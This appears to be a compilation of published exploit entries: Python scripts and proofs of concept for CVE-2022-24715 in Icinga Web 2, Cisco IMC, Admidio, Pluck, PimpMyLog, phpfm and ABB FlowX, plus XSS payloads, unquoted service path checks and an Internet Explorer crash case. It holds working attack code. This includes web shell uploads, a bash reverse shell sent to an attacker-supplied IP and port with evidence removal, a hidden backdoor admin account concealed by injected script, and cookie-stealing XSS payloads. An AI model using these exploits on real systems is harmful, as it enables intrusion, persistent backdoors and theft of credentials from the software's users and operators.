# Software Link: https://github.com/Icinga/icingaweb2
# Version: <2.8.6, <2.9.6, <2.10
# Tested on: Icinga Web 2 Version 2.9.2 on Linux
# CVE: CVE-2022-24715
# Based on: https://nvd.nist.gov/vuln/detail/CVE-2022-24715
import requests,argparse,re,random,string
from colorama import Fore,Style
def letter_random():
letras = string.ascii_lowercase
character_random = random.choices(letras, k=6)
return ''.join(character_random)
def users_url_password():
parser = argparse.ArgumentParser(description='Descripción de tu programa.')
parser.add_argument('-u', '--url',type=str,required=True, help='Insertar la URL http://ip_victima')
parser.add_argument('-U', '--user',type=str, required=True ,help='Insertar usuario -U user')
parser.add_argument('-P', '--password',type=str, required=True ,help='Insertar contraseña -P password')
parser.add_argument('-i', '--ip',type=str,required=True,help='Insertar IP de atacante -i IP')
parser.add_argument('-p','--port',type=str, required=True,help='Insertar puerto de atacante -p PORT')
args = parser.parse_args()
url = args.url
user = args.user
password=args.password
ip_attack = args.ip
port_attack = args.port
return url,user,password,ip_attack,port_attack
def login(url,user,password):
try:
login_url = url + "/icingaweb2/authentication/login"
session = requests.Session()
r = session.get(login_url)
csrf_regex = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0]
data_post = {"username":user,
"password":password,
"CSRFToken":csrf_regex,
"formUID":"form_login",
"btn_submit":"Login"
}
response = session.post(login_url,data=data_post)
if "Welcome to Icinga Web!" in response.text:
print(f"{Fore.GREEN}[*]{Style.RESET_ALL}Session successfully.")
r = session.get(login_url)
else:
print("[!]Failed to login.")
exit(1)
#return session,csrf_regex
except requests.exceptions.InvalidURL:
print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} Error URL :(")
exit(1)
return session,csrf_regex
def upload_file(session,url,character_random,csrf_regex):
webshell = f"""-----BEGIN RSA PRIVATE KEY-----
MIIBOgIBAAJBAKj34GkxFhD90vcNLYLInFEX6Ppy1tPf9Cnzj4p4WGeKLs1Pt8Qu
KUpRKfFLfRYC9AIKjbJTWit+CqvjWYzvQwECAwEAAQJAIJLixBy2qpFoS4DSmoEm
o3qGy0t6z09AIJtH+5OeRV1be+N4cDYJKffGzDa88vQENZiRm0GRq6a+HPGQMd2k
TQIhAKMSvzIBnni7ot/OSie2TmJLY4SwTQAevXysE2RbFDYdAiEBCUEaRQnMnbp7
9mxDXDf6AU0cN/RPBjb9qSHDcWZHGzUCIG2Es59z8ugGrDY+pxLQnwfotadxd+Uy
v/Ow5T0q5gIJAiEAyS4RaI9YG8EWx/2w0T67ZUVAw8eOMB6BIUg0Xcu+3okCIBOs
/5OiPgoTdSy7bcF9IGpSE8ZgGKzgYQVZeN97YE00
-----END RSA PRIVATE KEY-----
<?php system($_REQUEST["%s"]);?>
"""%character_random
upload_url = url + "/icingaweb2/config/createresource"
r = session.get(upload_url)
csrf = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0]
data_post ={"type":"ssh",
"name":"shm/"+character_random,
"user":f"../../../../../../../../../../../dev/shm/{character_random}/run.php",
"private_key":webshell,
"formUID":"form_config_resource",
"CSRFToken":csrf,
"btn_submit":"Save Changes"
}
upload_response = session.post(upload_url,data=data_post)
check = requests.get(url + f"/icingaweb2/lib/icinga/icinga-php-thirdparty/dev/shm/{character_random}/run.php")
if check.status_code != 200 :
print(f"{Fore.YELLOW}[!]{Style.RESET_ALL}Error uploading file. :(")
exit(1)
else:
print(f"{Fore.GREEN}[*]{Style.RESET_ALL}File uploaded successfully.")
def enable_module(session,url,character_random):
url_module = url+"/icingaweb2/config/general"
r_module = session.get(url_module)
csrf_module = re.findall(r'name="CSRFToken" value="([^"]*)"',r_module.text)[0]
data_post = {"global_show_stacktraces":"0",
"global_show_stacktraces":"1",
"global_show_application_state_messages":"0",
"global_show_application_state_messages":"1",
"global_module_path":"/dev/shm/",
"global_config_resource":"icingaweb2",
"logging_log":"none",
"themes_default":"Icinga",
"themes_disabled":"0",
"authentication_default_domain":"",
"formUID":"form_config_general",
"CSRFToken":f"{csrf_module}",
"btn_submit":"Save Changes"
}
resul = session.post(url_module,data_post)
#--------------------------------------------------
url_enable = url +"/icingaweb2/config/moduleenable"
r_enable = session.get(url_enable)
csrf_enable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_enable.text)[0]
data_enable = {"identifier":f"{character_random}","CSRFToken":f"{csrf_enable}","btn_submit":"btn_submit"}
resul_enable = session.post(url_enable,data_enable)
def reverse_shell(session,url,ip_attack,port_attack,character_random):
reverse_url = url + "/icingaweb2/dashboard"
reverse_exe_one = reverse_url + f'?{character_random}=echo+"bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{ip_attack}%2F{port_attack}%200%3E%261"+>+/tmp/{character_random}'
reverse_exe_two = reverse_url + f"?{character_random}=bash+/tmp/{character_random} &"
reverse_response_one = session.get(reverse_exe_one)
try:
reverse_response_two = session.get(reverse_exe_two, timeout=5)
except:
print(f"{Fore.RED}[*]{Style.RESET_ALL}Eliminating evidence")
remove = session.get(reverse_url + f"?{character_random}=rm+/tmp/{character_random}")
disable_url = url + "/icingaweb2/config/moduledisable"
r_disable = session.get(disable_url)
csrf_disable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_disable.text)[0]
data_disable = {"identifier":f"{character_random}","CSRFToken":csrf_disable,"btn_submit":"btn_submit"}
response_disable = session.post(disable_url,data=data_disable)
def disable_module(session,url,character_random):
url_disable = url + "/icingaweb2/config/moduledisable"
if __name__ == '__main__':
character_random = letter_random()
url,user,password,ip_attack,port_attack = users_url_password()
session,csrf_regex = login(url,user,password)
upload_file(session,url,character_random,csrf_regex)
enable_module(session,url,character_random)
reverse_shell(session,url,ip_attack,port_attack,character_random)
# Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.avg.com
# Software Link: https://www.avg.com/en-ww/homepage#pc
# Version: 7.5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36167
#PoC
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
AVG Anti-Spyware Guard AVG Anti-Spyware Guard C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe Auto
C:\Users>sc qc "AVG Anti-Spyware Guard"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AVG Anti-Spyware Guard
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : AVG Anti-Spyware Guard
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users>systeminfo
Host Name: DESKTOP-LA7J17P
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
OS Manufacturer: Microsoft Corporation
# Exploit Title: Game Jackal Server v5 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.allradiosoft.ru
# Software Link: https://www.allradiosoft.ru/en/ss/index.htm
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36166
#PoC
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i
auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Game Jackal Server v5
GJServiceV5 C:\Program Files
(x86)\SlySoft\Game Jackal v5\Server.exe Auto
C:\Users>sc qc GJServiceV5
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: GJServiceV5
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\SlySoft\Game Jackal
v5\Server.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Game Jackal Server v5
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users>systeminfo
Host Name: DESKTOP-LA7J17P
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
OS Manufacturer: Microsoft Corporation
[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass
[+] Cisco IMC Supervisor - < 2.2.1.0
[+] Date: 08/21/2019
[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo
[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html
[+] Vulnerability Discovery : Pedro Ribeiro
[+] Exploit Author: Fatih Sencer
[+] CVE: CVE-2019-1937
----------------------------------------------------
Usage:
./python3 CiscoIMC-Bypass.py -u host
[+] Target https://xxxxxx.com
[+] Target OK
[+] Exploit Succes
[+] Login name : admin
[+] Cookie : REACTED
"""
import argparse,requests,warnings,base64,json,random,string
from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter('ignore',InsecureRequestWarning)
def init():
parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass')
parser.add_argument('-u','--host',help='Host', type=str, required=True)
args = parser.parse_args()
exploit(args)
def exploit(args):
session = requests.Session()
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)",
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://{}/".format(args.host),
"X-Starship-UserSession-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)),
"X-Starship-Request-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
}
target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host)
print("[+] Target {}".format(args.host))
exp_send = session.get(target, headers=headers, verify=False, timeout=10)
if exp_send.status_code == 200:
print("[+] Target OK")
body_data = json.loads(exp_send.text)
if not (body_data.get('loginName') is None):
print("[+] Exploit Succes")
print("[+] Login name : {}".format(body_data.get('loginName')))
print("[+] Cookie : {}".format(session.cookies.get_dict()))
else:
print("[-] Exploit Failed")
else:
print("[-] N/A")
exit()
if __name__ == "__main__":
init()
Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE)
Application: Admidio
Version: 4.2.10
Bugs: RCE
Technology: PHP
Vendor URL: https://www.admidio.org/
Software Link: https://www.admidio.org/download.php
Date of found: 10.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
Steps:
1. Login to account
2. Go to Announcements
3. Add Entry
4. Upload .phar file in image upload section.
.phar file Content
<?php echo system('cat /etc/passwd');?>
5. Visit .phar file ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar )
Request:
POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: localhost
Content-Length: 378
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=Announcements
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
Connection: close
------WebKitFormBoundaryne9TRuC1tAqhR86r
Content-Disposition: form-data; name="upload"; filename="shell.phar"
Content-Type: application/octet-stream
<?php echo system('cat /etc/passwd');?>
------WebKitFormBoundaryne9TRuC1tAqhR86r
Content-Disposition: form-data; name="ckCsrfToken"
o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
------WebKitFormBoundaryne9TRuC1tAqhR86r--
#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)
#Application: pluck
#Version: 4.7.18
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://github.com/pluck-cms/pluck
#Software Link: https://github.com/pluck-cms/pluck
#Date of found: 10-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
login_url = "http://localhost/pluck/login.php"
upload_url = "http://localhost/pluck/admin.php?action=installmodule"
headers = {"Referer": login_url,}
login_payload = {"cont1": "admin","bogus": "","submit": "Log in"}
file_path = input("ZIP file path: ")
multipart_data = MultipartEncoder(
fields={
"sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),
"submit": "Upload"
}
)
session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)
if login_response.status_code == 200:
print("Login account")
upload_headers = {
"Referer": upload_url,
"Content-Type": multipart_data.content_type
}
upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)
if upload_response.status_code == 200:
print("ZIP file download.")
else:
print("ZIP file download error. Response code:", upload_response.status_code)
else:
print("Login problem. response code:", login_response.status_code)
rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php"
rce=requests.get(rce_url)
print(rce.text)
# Exploit Title: PimpMyLog v1.7.14 - Improper access control
# Date: 2023-07-10
# Exploit Author: thoughtfault
# Vendor Homepage: https://www.pimpmylog.com/
# Software Link: https://github.com/potsky/PimpMyLog
# Version: 1.5.2-1.7.14
# Tested on: Ubuntu 22.04
# CVE : N/A
# Description: PimpMyLog suffers from improper access control on the account creation endpoint, allowing a remote attacker to create an admin account without any existing permissions. The username is not sanitized and can be leveraged as a vector for stored XSS. This allows the attacker to hide the presence of the backdoor account from legitimate admins. Depending on the previous configuration, an attacker may be able to view sensitive information in apache, iis, nginx, and/or php logs. The attacker can view server-side environmental variables through the debug feature, which may include passwords or api keys.
import requests
import argparse
from base64 import b64encode
js = """var table = document.getElementById("userlisttable");
var rows = table.getElementsByTagName("tr");
for (var i = 0; i < rows.length; i++) {
var cells = rows[i].getElementsByTagName("td");
for (var j = 0; j < cells.length; j++) {
var anchors = cells[j].getElementsByTagName("a");
for (var k = 0; k < anchors.length; k++) {
if (
anchors[k].innerText === "{}" ||
anchors[k].innerText.includes("atob(") ||
anchors[k].querySelector("script") !== null
) {
rows[i].parentNode.removeChild(rows[i]);
}
}
}
}
var userCountElement = document.querySelector('.lead');
var userCountText = userCountElement.textContent;
var userCount = parseInt(userCountText);
if(!isNaN(userCount)){
userCount--;
userCountElement.textContent = userCount + ' Users';
}"""
payload = "<script>eval(atob('{}'));</script>"
def backdoor(url, username, password):
config_url = url + '/inc/configure.php'
print("[*] Creating admin account...")
r = requests.post(config_url, data={'s':'authsave', 'u': username, 'p': password})
if r.status_code != 200:
print("[!] An error occured")
return
print("[*] Hiding admin account...")
base64_js = b64encode(js.format(username).encode()).decode()
xss_payload = payload.format(base64_js)
r = requests.post(config_url, data={'s':'authsave', 'u': xss_payload, 'p': password})
if r.status_code != 200:
print("[!] An error occured")
return
print("[*] Exploit finished!")
parser = argparse.ArgumentParser()
parser.add_argument('--url', help='The base url of the target', required=True)
parser.add_argument('--username', default='backdoor', help='The username of the backdoor account')
parser.add_argument('--password', default='backdoor', help='The password of the backdoor account')
args = parser.parse_args()
backdoor(args.url.rstrip('/'), args.username, args.password)
# Exploit Title: phpfm v1.7.9 - Authentication type juggling
# Date: 2023-07-10
# Exploit Author: thoughtfault
# Vendor Homepage: https://www.dulldusk.com/phpfm/
# Software Link: https://github.com/dulldusk/phpfm/
# Version: 1.6.1-1.7.9
# Tested on: Ubuntu 22.04
# CVE : N/A
"""
An authentication bypass exists in when the hash of the password selected by the user incidently begins with 0e, 00e, and in some PHP versions, 0x. This is because loose type comparision is performed between the password hash and the loggedon value, which by default for an unauthenticated user is 0 and can additionally be controlled by the attacker. This allows an attacker to bypass the login and obtain remote code execution.
A list of vulnerable password hashes can be found here.
https://github.com/spaze/hashes/blob/master/md5.md
"""
import requests
import sys
if len(sys.argv) < 2:
print(f"[*] Syntax: ./{__file__} http://target/")
sys.exit(0)
url = sys.argv[1].rstrip('/') + "/index.php"
payload_name = "shell.php"
payload = '<?php echo "I am a shell"; ?>'
payload_url = url.replace("index.php", payload_name)
headers = {"Accept-Language": "en-US,en;q=0.5", "Cookie": "loggedon=0"}
files = {"dir_dest": (None, "/srv/http/"), "action": (None, "10"), "upfiles[]": ("shell.php", payload) }
requests.post(url, headers=headers, files=files)
r = requests.get(payload_url)
if r.status_code == 200:
print(f"[*] Exploit sucessfull: {payload_url}")
print(r.text)
else:
print(f"[*] Exploit might have failed, payload url returned a non-200 status code of: {r.status_code}" )
# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
# Date: 2023-03-31
# Exploit Author: Paul Smith
# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
# Version: ABB Flow-X all versions before V4.00
# Tested on: Kali Linux
# CVE: CVE-2023-1258
#!/usr/bin/python
import sys
import re
from bs4 import BeautifulSoup as BS
import lxml
import requests
# Set the request parameter
url = sys.argv[1]
def dump_users():
response = requests.get(url)
# Check for HTTP codes other than 200
if response.status_code != 200:
print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text)
exit()
# Decode the xml response into dictionary and use the data
data = response.text
soup = BS(data, features="xml")
logs = soup.find_all("log")
for log in logs:
test = re.search('User (.*?) logged in',str(log))
if test:
print(test.group(0))
def main():
dump_users()
if __name__ == '__main__':
main()
#Exploit Title: CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Login to account
2. Go to Content Manager
3. Add New Content
4. Type as '<img src=x onerror=alert(document.cookie)>' to metadata section
payload: <img src=x onerror=alert(document.cookie)>
5. Submit Content
6. Visit Content (http://localhost/index.php?page=test)
Request:
POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 584
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6
Connection: close
mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1
## Title: Statamic 4.7.0 - File-Inclusion
## Author: nu11secur1ty
## Date: 07.13.2023
## Vendor: https://statamic.com/
## Software: https://demo.statamic.com/
## Reference: https://portswigger.net/web-security/file-upload
## Description:
The statamic-4.7.0 suffers from file inclusion - file upload vulnerability.
The attacker can upload a malicious HTML file and can share the
malicious URL which uses the infected HTML file
to the other attackers in the network, they easily can look at the
token session key and can do very dangerous stuff.
## Staus: HIGH Vulnerability
[+]Exploit:
```js
<html>
<script>
alert(document.cookie);
</script>
</html>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/statamic/2023/statamic-4.7.0)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/statamic-470-file-inclusion-unsanitized.html)
## Time spend:
01:10:00
<!--
Source: https://code.google.com/p/google-security-research/issues/detail?id=677
Minimized PoC:
-->
<style type="text/css">
*:before {
content:counter(counter-0) close-quote url(?);
column-count:1;
position:fixed;
}
</style>
<!--
Backtrace for reference:
2:051:x86> k
ChildEBP RetAddr
0c2c9688 60ca029e MSHTML!Layout::LayoutBuilderDriver::BuildPageLayout+0x6f2093
0c2c974c 60c9fe17 MSHTML!Layout::PageCollection::FormatPage+0x167
0c2c9854 60caad7e MSHTML!Layout::PageCollection::LayoutPagesCore+0x2c3
0c2c9880 60caac9f MSHTML!Layout::PageCollection::LayoutPages+0xca
0c2c9938 60caa49c MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x3b8
0c2c99c0 61295d6e MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xec
0c2c9a04 60c8c52f MSHTML!CView::EnsureSize+0x224
0c2c9a5c 610977ce MSHTML!CView::EnsureView+0x3a5
0c2c9b10 60dd92ab MSHTML!CDoc::RunningToInPlace+0x1b4
0c2c9b30 60dfaabe MSHTML!CServer::TransitionTo+0x50
0c2c9b48 62118e72 MSHTML!CServer::Show+0x50
0c2c9b68 62118d61 IEFRAME!CDocObjectHost::_ShowMsoView+0xd8
0c2c9b84 6109585d IEFRAME!CDocObjectHost::ActivateMe+0x31
0c2c9ba8 610957d1 MSHTML!CServer::ActivateView+0x81
0c2c9bd8 6109577b MSHTML!CServer::DoUIActivate+0x21
0c2c9c0c 60df9e59 MSHTML!CServer::DoVerb+0x77
0c2c9c4c 60df9e0e MSHTML!CMarkup::Navigate+0x3b
0c2c9c5c 62118f52 MSHTML!CDoc::Navigate+0x1e
0c2c9ca0 62273041 IEFRAME!CDocObjectHost::_ActivateMsoView+0x8f
0c2c9cc0 620b51c0 IEFRAME!CDocObjectHost::UIActivate+0x4c
0c2c9cd8 62272f7d IEFRAME!CDocObjectView::UIActivate+0x20
0c2c9d04 620dc130 IEFRAME!CBaseBrowser2::_UIActivateView+0xa5
0c2cbdd0 620e464c IEFRAME!CBaseBrowser2::v_ActivatePendingView+0x200
0c2cbdf0 620e01a4 IEFRAME!CShellBrowser2::v_ActivatePendingView+0x2c
0c2cbe0c 620e00c9 IEFRAME!CBaseBrowser2::_ExecShellDocView+0xcb
0c2cbe40 6209bf4c IEFRAME!CBaseBrowser2::Exec+0x20c
0c2cc0d0 620dafd5 IEFRAME!CShellBrowser2::Exec+0xdd
0c2cc108 620d9a4b IEFRAME!CDocObjectHost::_Navigate+0x50
0c2cc338 620da7f2 IEFRAME!CDocObjectHost::_OnReadyState+0x13c
0c2cc398 620da728 IEFRAME!CDocObjectHost::_OnChangedReadyState+0xc6
0c2cc3a0 60d9c704 IEFRAME!CDocObjectHost::OnChanged+0x1b
0c2cc3f0 60d82967 MSHTML!CBase::FirePropertyNotify+0x106
0c2cc414 60d8869c MSHTML!CMarkup::SetReadyState+0x85
0c2cc5b8 60d8d5ee MSHTML!CMarkup::SetInteractiveInternal+0x2bc
0c2cc5ec 60d8de5e MSHTML!CMarkup::RequestReadystateInteractive+0x92
0c2cc618 60d7cfea MSHTML!CMarkup::BlockScriptExecutionHelper+0xf7
0c2cc74c 60d83a78 MSHTML!CHtmPost::Exec+0xa1c
0c2cc76c 60d839de MSHTML!CHtmPost::Run+0x3d
0c2cc78c 60d8c2c3 MSHTML!PostManExecute+0x61
0c2cc7a0 60d8d0f8 MSHTML!PostManResume+0x7b
0c2cc7d0 60d4a45d MSHTML!CHtmPost::OnDwnChanCallback+0x38
0c2cc7e8 60c6d55b MSHTML!CDwnChan::OnMethodCall+0x2f
0c2cc830 60c6cc72 MSHTML!GlobalWndOnMethodCall+0x17b
0c2cc884 757d8e71 MSHTML!GlobalWndProc+0x103
0c2cc8b0 757d90d1 user32!_InternalCallWinProc+0x2b
0c2cc944 757da62a user32!UserCallWinProcCheckWow+0x18e
0c2cc9b8 757da680 user32!DispatchMessageWorker+0x473
0c2cc9c4 6207a77c user32!DispatchMessageW+0x10
0c2cfb94 620edf88 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
0c2cfc54 7201ebec IEFRAME!LCIETab_ThreadProc+0x3e7
0c2cfc6c 67d73a31 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
0c2cfca4 67f99608 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
WARNING: Stack unwind information not available. Following frames may be wrong.
0c2cfce0 75a77c04 vfbasics+0x19608
0c2cfcf4 77a1ad5f KERNEL32!BaseThreadInitThunk+0x24
0c2cfd3c 77a1ad2a ntdll_779c0000!__RtlUserThreadStart+0x2f
0c2cfd4c 00000000 ntdll_779c0000!_RtlUserThreadStart+0x1b
-->